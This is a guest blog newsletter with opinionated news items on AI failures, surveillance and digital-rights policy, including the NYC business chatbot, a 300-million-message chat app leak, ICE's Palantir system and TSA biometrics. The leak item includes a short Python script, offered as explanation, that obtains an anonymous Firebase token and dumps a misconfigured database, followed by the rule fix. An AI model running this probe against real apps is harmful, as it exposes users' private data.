GUEST BLOG: Talk Liberation – Code Versus Conscience: When AI Operates Outside Ethics & Law

In this edition:
- NYC AI Chatbot That Instructed Businesses to Break the Law Is Getting Axed
- Popular AI Chat App Leaks 300 Million Private User Convos
- U.S. Congress Votes to Keep Kill Switch in Car Tech
- Bill Gates & OpenAI Team Up for Healthcare Experiment
- Feds Are Creating No-Fly Zones While ICE Fully Integrates Palantir Tech
- U.S. to Use AI to Draft Transport Safety Regulations
- TSA Seeks to Integrate Digital ID Biometrics with Federal Database
- Wyoming Introduces Bill Against Foreign Censorship on U.S. Citizens
NYC AI Chatbot That Instructed Businesses to Break the Law Is Getting Axed
Five months after its high-profile launch, New York City’s AI-powered business chatbot, a cornerstone of Mayor Eric Adams’ MyCity portal initiative, was providing business owners and landlords with information that was often incomplete, incorrect, and, in the worst cases, dangerously inaccurate. Powered by Microsoft’s Azure AI, the chatbot was designed to let entrepreneurs “access trusted information” on compliance and regulations drawn from over 2,000 official city web pages. However, investigative testing by The Markup revealed the bot was actively misinforming users on fundamental pillars of housing, consumer, and worker protection law, falsely stating that landlords can refuse tenants with Section 8 vouchers, that restaurants can go cash-free, and that there are no restrictions on lockouts or rent amounts—all assertions that directly contradict New York City statutes. Now the city’s new mayor has decided to kill the bot as a cost-saving measure.
A business owner had previously alerted the NYC Hospitality Alliance to the errors, and its Executive Director warned the tool could also “be a massive liability if it’s providing the wrong legal information.” Housing experts found the bot incorrectly advised that locking out a tenant is legal, a clear violation of tenant rights after 30 days of residency, and said that if this was the case, the bot should be shut down. This created a dangerous paradox: users were instructed to rely on the bot for official guidance, yet given no practical way to distinguish truth from fabrication, especially since the bot often failed to provide source links for verification and gave inconsistent answers even to identical questions. By embedding an unreliable system within a government portal, the city risked normalizing its flaws, potentially leading business owners to make consequential decisions based on incorrect AI-generated advice, with the onus unfairly placed on them to identify and report the system’s failures.
This deployment is not an isolated misstep but part of a well-documented pattern in which the rush to adopt generative AI outpaces responsible governance and an honest assessment of its limitations. The NYC bot joins a growing list of cautionary tales—from property management chatbots unlawfully denying housing to tax preparation AIs dispensing faulty advice—demonstrating that these systems frequently fail when applied to complex, real-world scenarios with legal and financial consequences. The city’s failed and soon-to-be-abandoned experiment—using residents as real-time testers, a rationale echoed by a Microsoft executive regarding a previous bot failure—raises urgent ethical and practical questions about the rollout of AI in government services. A tool meant to simplify access to government services can easily become a vector of liability for citizens, where inaccuracies lead to illegal actions and eroded public trust instead of streamlined assistance.
Popular AI Chat App Leaks 300 Million Private User Convos
A striking security failure in one of the world’s most popular AI chat applications exposed some of the darkest, most private confessions humans share with machines. Chat & Ask AI, an app with over 50 million users, left a database containing an estimated 300 million messages from 25 million users completely exposed due to a basic, well-known security misconfiguration. The trove of data, discovered by an independent security researcher, included complete chat histories, timestamps, and user settings, revealing searches for how to “painlessly kill myself,” instructions for writing suicide notes, and detailed inquiries about manufacturing drugs like crystal methamphetamine. The breach goes beyond a typical data leak; it is a catastrophic failure of custodianship over the most sensitive digital dialogues, occurring in an app that prominently advertised “enterprise-grade security” and GDPR compliance.
The root cause was a dangerously common error in the app’s use of Google Firebase, a mobile development platform. By leaving default settings in place, the app’s backend storage—meant to be private—became accessible to anyone who could authenticate, a flaw so prevalent that cybersecurity experts have tools to scan for it automatically. While the developer, Codeway, fixed the issue within hours of being notified, the exposure period remains unknown, and the scale points to a systemic problem in app development. Security researcher Dan Guido of Trail of Bits confirmed this is a “well known weakness,” noting his firm could create a tool to find such vulnerabilities in just 30 minutes. A broader scan found that 103 of 200 iOS apps examined had the same flaw, cumulatively exposing tens of millions of user files to potential theft or exploitation.
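For readers curious about the mechanics, here is a minimal sketch, in Python, of the class of misconfiguration being described. Everything specific in it is assumed for illustration: the API key, database URL, and rules are hypothetical placeholders, not Codeway’s actual configuration, and it presumes a Firebase Realtime Database backend. It simply shows why rules that grant read access to any authenticated user, combined with anonymous sign-in, let a stranger mint a throwaway token and read the backend through Firebase’s standard REST endpoints.

```python
# Minimal sketch of probing an over-permissive Firebase backend.
# All identifiers below are hypothetical placeholders for illustration only.
import requests

API_KEY = "AIzaSy-EXAMPLE-KEY"  # a Firebase web API key; these ship inside app binaries
DB_URL = "https://example-project-default-rtdb.firebaseio.com"  # hypothetical database URL

# Step 1: anonymous sign-up. If anonymous auth is enabled, any client on the
# internet can mint a valid Firebase ID token with a single request.
signup = requests.post(
    f"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key={API_KEY}",
    json={"returnSecureToken": True},
    timeout=10,
)
id_token = signup.json().get("idToken")

# Step 2: with permissive rules such as ".read": "auth != null", that throwaway
# token is enough to read data over the Realtime Database REST API.
dump = requests.get(f"{DB_URL}/.json", params={"auth": id_token}, timeout=30)
print(dump.status_code, len(dump.content))
```

The defence is equally unglamorous: security rules scoped to the requesting user’s own records (for example, `auth.uid == $uid` in Realtime Database rules) rather than to any authenticated session, which is precisely the hardening step the exposed app appears to have skipped.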
Beyond the security malpractice, the data sample lays bare a distressing reality: individuals are using AI chatbots as digital confidants in crises, seeking guidance on suicide, self-harm, and illegal activities. This reinforces growing concerns from recent reporting, which has linked chatbot interactions to actual suicides and shown these systems often fail to handle high-risk questions safely. The breach thus represents a double betrayal: first, by an AI that may provide dangerous, unvetted information in moments of acute vulnerability, and second, by the companies that build these platforms but fail to implement fundamental security, leaving users’ most desperate questions fully exposed. It stands as a dire warning of the human cost when the race to deploy persuasive AI drastically outpaces the responsibility to secure it and safeguard the data of millions.
U.S. Congress Votes to Keep Kill Switch in Car Tech
The U.S. House of Representatives this week rejected an effort to strip funding for a federal mandate requiring impaired-driving prevention technology in new vehicles, leaving intact a potential pathway for what some ominously label a government “kill switch.” The amendment, offered by Representative Thomas Massie of Kentucky, sought to prohibit the use of funds to implement Section 24220 of the 2021 Infrastructure Investment and Jobs Act, a provision that directs the Department of Transportation to develop regulations for technology that can “prevent or limit motor vehicle operation” when driver impairment is detected. The measure failed 268 to 164, opening a profound debate over the privacy and liberty concerns raised by implementing such technology.
The vote did little to resolve the long-running fight between safety and the protection of civil liberties, instead pushing the critical decisions to federal regulators. Proponents, like Representative Debbie Dingell of Michigan, argue the technology is a vital tool to prevent thousands of drunk-driving deaths and vehemently deny it would involve tracking or dangerous mid-drive shutdowns, calling such claims “blatantly false.” However, the law’s text is notably open-ended, specifying neither the detection methods nor privacy safeguards. This regulatory vacuum leaves the National Highway Traffic Safety Administration (NHTSA) with wide latitude to mandate systems that could rely on driver-facing cameras, continuous performance monitoring, technological manipulation, or biometric analysis, potentially creating detailed, ongoing data streams on driver behaviour without clear limits on data retention, sharing, or driver override capabilities for false positives.
With Congress failing to block the mandate’s advancement, the difficult task of defining this technology now falls to the Department of Transportation, a task with wide-ranging consequences. Without explicit statutory guardrails, the mandate risks normalising pervasive government-sanctioned surveillance within private vehicles. “The vehicle ‘kill-switch’ is precisely the kind of overreach that will empower regulatory agencies to manage behaviour without votes by elected representatives in Congress or real accountability. We must oppose this erosion of civil liberties and not set this precedent for government monitoring of everyday Americans. Kill switch technology will not be confined to one narrow purpose, no matter what its proponents believe or claim,” argued Clyde Wayne Crews of the Competitive Enterprise Institute. The coming regulatory process will serve as a defining battleground in determining whether these systems become minimally intrusive safety features or establish a precedent for unprecedented data collection and control in everyday life, including personal transport, all under the all-too-familiar banner of “public safety.”
Bill Gates & OpenAI Team Up for Healthcare Experiment
In a move promising to redefine healthcare access in under-resourced regions, the Gates Foundation and OpenAI have launched a $50 million initiative to embed artificial intelligence tools directly into the primary care systems of Rwanda and other African nations. Dubbed Horizon1000, the project aims to address the critical shortage of health workers by deploying AI for tasks like managing patient records and aiding clinical evaluations—a vision Bill Gates recently championed at Davos as a potential “game-changer.” Proponents argue the technology will act as vital support for overwhelmed medical staff rather than a replacement, alleviating an “impossible situation” where caregivers face too many patients with too little administrative and clinical support. In a blog post, Gates wrote, “In poorer countries with enormous health worker shortages and lack of health systems infrastructure, AI can be a game-changer in expanding access to quality care. I believe this partnership with OpenAI, governments, innovators, and health workers in sub-Saharan Africa is a step towards the type of AI we need more of.”
But the experiment has ignited a fierce ethical debate, casting Africa once again as a testing ground for powerful technologies before they are globally deployed. Introducing complex AI models into regions with nascent data privacy laws and varying regulatory oversight risks creating a system of “digital colonization,” in which vulnerable populations exchange sensitive health data for access without robust consent or control. The main concerns centre on the immense personal datasets required to train these models and the potential for algorithmic bias, especially given that leading AI systems are predominantly trained on English-language data, which could lead to dangerous misunderstandings. Another major concern is outright nefarious experimentation on populations, which has occurred notoriously throughout history and precisely in this region; civil society organizations, including Doctors Without Borders, have sharply criticized the influence of Western-dominated institutions over global health policies affecting poorer nations. Gates himself was heavily criticised for his involvement in Africa during the COVID-19 pandemic, especially when his foundation opposed waiving intellectual property rights for vaccines.
While the Gates Foundation now pledges rigorous monitoring for safety and bias, and Rwanda has established a national health intelligence centre to manage the rollout, the fundamental power imbalance remains, and it is impossible to ignore. The initiative showcases a recurring pattern in which global foundations and tech corporations treat regions with urgent needs and flexible regulatory environments as living laboratories, with real people as the test subjects. The success of Horizon1000 will be measured not only by its clinical efficiency, but by the agenda it sets for data sovereignty and informed consent, and by whether AI in global health can ever serve as an equitable tool for empowerment or will instead become yet another vector for extraction, abuse, and ultimate control.
Feds Are Creating No-Fly Zones While ICE Fully Integrates Palantir Tech
Internal documents reveal that the enforcement architecture of United States Immigration and Customs Enforcement (ICE) is being fundamentally rebuilt into a predictive, data-driven surveillance system, with the tech firm Palantir at its core. The Palantir-built mobile application, called ELITE, provides officers with interactive maps populated with potential deportation targets, complete with dossiers and a confidence score for each target’s current address. This tool, part of a broader $30 million Immigration Lifecycle Operating System (ImmigrationOS) contract, synthesizes data from a vast array of sources—including commercial data brokers selling location pings, social media intelligence scraped by AI, and administrative records from other agencies like Health and Human Services. The system allows for the mass collection and analysis of personal data to identify patterns, pinpoint likely locations, and prioritize targets, transforming neighborhood raids into technologically optimized operations. Meanwhile, the U.S. Federal Aviation Administration has created a “no-fly zone” within 3,000 feet of Department of Homeland Security facilities and mobile assets.
The ELITE digital infrastructure is being shielded from public oversight and accountability through both legal doctrine and physical control of space. An internal ICE legal analysis, obtained by the ACLU, argues that commercially purchased location data is not subject to warrant requirements, treating intimate movements as a public commodity. Simultaneously, the Federal Aviation Administration has enacted a novel “no-fly zone” that creates a moving bubble of prohibited airspace around DHS personnel and vehicle convoys, classifying the skies up to a half-mile from an ICE raid as “national defense airspace.” This order criminalizes the use of consumer drones to document enforcement actions, a tactic previously used by activists and journalists to monitor for brutality and overreach, thereby removing a critical layer of public scrutiny while DHS itself continues to surveil protests with its own Predator drones.
The convergence of these technologies and policies marks a profound shift toward not only an autonomous deportation machine but also a heavily armed, technology-saturated enforcement state, justified under the banner of national security and operational efficiency. ICE has explicitly stated that transitioning away from Palantir’s proprietary ecosystem would pose an “unacceptable” risk and a “threat to national security,” effectively locking the agency into a single, controversial supplier and vision for enforcement. This creates a system where the line between public safety and pervasive surveillance is erased, where individuals can be targeted based on algorithmic inferences from their digital breadcrumbs, and where the state can conduct its most contentious domestic operations in a shroud of data-fuelled secrecy and physical seclusion from observation.
U.S. to Use AI to Draft Transport Safety Regulations
The U.S. Department of Transportation (DOT) is embarking on a radical experiment in governance: deploying artificial intelligence to draft the federal regulations that keep cars safe, airplanes in the air, trains from derailing, and pipelines from exploding. According to internal documents and staff interviews, DOT leadership, championing an initiative they say has President Trump’s enthusiasm, plans to use Google’s Gemini AI to generate regulatory text, aiming to collapse a rule-making process that often takes years into a span of weeks or even days. The agency’s general counsel, Gregory Zerzan, captured the driving philosophy behind the push, stating in a meeting that “We don’t need the perfect rule on XYZ. We want good enough,” and describing a strategy of “flooding the zone” with rapidly produced regulations that places the priority on quantity. This has alarmed some career safety experts within the agency.
The move to automate the core drafting of rules represents an unprecedented escalation in the administration’s embrace of AI for federal functions. While past uses have focused on translation or data analysis, deploying large language models—notorious for factual hallucinations and a lack of human reasoning—to craft legally binding safety standards is uncharted territory. Proponents envision a future where AI handles 80-90% of the writing, reducing veteran rule-writers to proofreaders of machine-generated “word salad.” However, critics, including the DOT’s former acting AI chief, warn this is akin to having a high school intern draft life-or-death regulations, gambling with public safety in a reckless bid for bureaucratic speed. The concern is exacerbated by a significant reduction in institutional expertise: the DOT has lost nearly 4,000 employees, including over 100 attorneys, since the current administration took office.
The coming clash will not be about the utility of AI as a research tool, but about the degree of autonomy granted to it in the regulatory process. Some academics note that, used as a tightly supervised assistant, AI could offer efficiencies, but ceding primary drafting authority risks producing legally deficient rules that fail the requirement for “reasoned decision-making.” With the DOT already having used AI to draft an unpublished FAA rule, the department is positioned as the test case for a broader ideological project, favoured by figures like Elon Musk, to automate and drastically reduce the federal regulatory framework. The ultimate cost of pursuing “good enough” rules at breakneck speed may be measured in more than just legal challenges—it could be measured in the lives of the citizens directly impacted.
TSA Seeks to Integrate Digital ID Biometrics with Federal Database
The Transportation Security Administration (TSA) is proposing a digital identity framework, the MyTSA PreCheck ID, that would significantly change its trusted traveler programs and transform airport screening into a more integrated, biometric-driven data exchange. As outlined in a notice in the Federal Register, the proposal extends the existing PreCheck program into the mobile environment, requiring participants to provide additional biometric data—including fingerprints and facial imagery—beyond the standard biographic information collected for enrolment. This data would be consolidated under a “modernised” identity infrastructure, where biometrics are fed into Department of Homeland Security (DHS) databases like the Automated Biometric Identification System (IDENT) and continuously verified against FBI records through the Next Generation Identification system and its Rap Back service for the duration of a traveler’s active membership.
The proposal centres on a centralised data collection and sharing model designed to reduce administrative duplication while deepening government access to personal details. Applicants for the new digital ID would manage their information through a Customer Service Portal accessed via the government’s Login.gov authentication service, where they can upload documents and adjust preferences. A key feature is a cooperative arrangement with U.S. Customs and Border Protection (CBP) that allows PreCheck biographic and biometric data to be reused for processing Global Entry applications, creating a more unified trusted traveler ecosystem. TSA is also moving forward with its separate ConfirmID program—a $45 fee-based service for passengers who arrive at a checkpoint without a REAL ID—which is set to begin on February 1. Over the next three years, the agency projects processing data from more than 25 million people, representing nearly 4.7 million annual administrative hours, while keeping enrollment fees consistent at $78 for five years.
While framed by the TSA as a necessary modernisation for convenience and efficiency, the combination of mobile credentials, indefinite biometric retention, and expanded inter-agency data sharing signals a move toward a more centralised national identity model. The proposal encourages travelers to exchange increasing amounts of personal and biological information for the promise of shorter security lines, a tradeoff that reshapes the meaning of “voluntary” participation in the context of air travel security. With the public comment window open until March 16, the mainstream debate will centre on whether the benefits of a streamlined checkpoint experience justify the deeper and more permanent integration of individual biometrics into federal surveillance and vetting systems.
Wyoming Introduces Bill Against Foreign Censorship on U.S. Citizens
Wyoming has introduced the nation’s first legislative shield against foreign censorship with the Guaranteeing Rights Against Novel International Tyranny and Extortion (GRANITE) Act. Sponsored by Representative Daniel Singh, the bill directly challenges foreign governments—citing actions by the UK, EU, and Brazil—that pressure American entities over speech protected by the First Amendment. Its core mechanism creates a powerful private right of action: any Wyoming resident, business, or US person with servers in the state can sue a foreign government for attempting to enforce a censorship demand, with penalties starting at $1 million or 10% of the entity’s US revenue per violation. The legislation is designed to transform Wyoming into a legal safe harbor, explicitly inviting targeted platforms and creators to establish a “nexus” in the state to gain its protections.
The GRANITE Act establishes a comprehensive defensive barrier within the state’s jurisdiction. It prohibits Wyoming courts and state agencies from recognizing or enforcing any foreign censorship judgments. Further, the bill forbids all state cooperation with such foreign orders, including refusing extradition requests or data demands related to constitutionally protected speech. Crucially, the law’s service of process provisions are crafted to prevent foreign governments from using procedural loopholes, ensuring that even sending a censorship threat into Wyoming constitutes a legally actionable event. This framework aims to render foreign coercion “toothless” within the state’s borders, as explained by attorney Preston Byrne, who helped draft the bill. In particular, the bill is a targeted response to speech restrictions imposed on American platforms through measures like the UK’s Online Safety Act.
By positioning itself as America’s newest free speech haven, Wyoming has garnered significant federal attention, with a similar version of the bill reportedly under review in Congress. Supporters envision the GRANITE Act as a transformative model, asserting that First Amendment protections do not stop “at the water’s edge.” The legislation aligns with the federal SPEECH Act but goes further by providing an aggressive sword of litigation alongside its defensive shield. If enacted, it would mark one of the strongest state-level rebukes to the global trend of extraterritorial speech regulation, aiming to deter foreign overreach by imposing a severe financial cost for targeting U.S. speech.